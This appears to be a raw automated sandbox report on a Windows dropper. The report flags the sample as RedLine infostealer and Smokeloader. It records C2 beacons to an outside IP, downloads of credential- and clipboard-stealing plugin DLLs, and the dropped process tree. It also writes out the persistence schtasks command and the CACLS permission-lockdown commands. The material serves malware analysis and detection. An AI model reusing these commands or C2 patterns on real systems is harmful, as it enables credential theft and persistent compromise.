                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 13:16:28 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                          Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_001786E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_001786E2
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 13:16:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1

                          System Summary

                          barindex
                          Source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C3BA20_2_010C3BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C5C9E0_2_010C5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01093BA21_2_01093BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01095C9E1_2_01095C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00408C602_2_00408C60
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040DC112_2_0040DC11
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00407C3F2_2_00407C3F
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00418CCC2_2_00418CCC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00406CA02_2_00406CA0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004028B02_2_004028B0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004182442_2_00418244
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004016502_2_00401650
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00402F202_2_00402F20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004193C42_2_004193C4
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004187882_2_00418788
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00402F892_2_00402F89
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00402B902_2_00402B90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004073A02_2_004073A0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC31F02_2_01FC31F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FD89EF2_2_01FD89EF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC31872_2_01FC3187
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC18B72_2_01FC18B7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC786D2_2_01FC786D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC2B172_2_01FC2B17
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC2DF72_2_01FC2DF7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FD84AB2_2_01FD84AB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC77D92_2_01FC77D9
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FD8F332_2_01FD8F33
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDA7252_2_01FDA725
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC6F072_2_01FC6F07
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC8EC72_2_01FC8EC7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC7EA62_2_01FC7EA6
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FCDE782_2_01FCDE78
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_02230DB02_2_02230DB0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_001985308_2_00198530
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0019754D8_2_0019754D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00176F408_2_00176F40
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010C1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01091F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_01091F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: String function: 0040E1D8 appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: String function: 01FCE43F appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 00187CE0 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 00185E20 appears 130 times
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 441732 bytes, 2 files, at 0x2c +A "bjAg.exe" +A "xriv.exe", ID 1565, number 1, 20 datablocks, 0x1503 compression
                          Source: bjAg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 250578 bytes, 2 files, at 0x2c +A "ajAf.exe" +A "nika.exe", ID 1525, number 1, 12 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ajAf.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/14@0/1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010C597D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0223A1A8 ChangeServiceConfigA,2_2_0223A1A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_010C4FE0
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
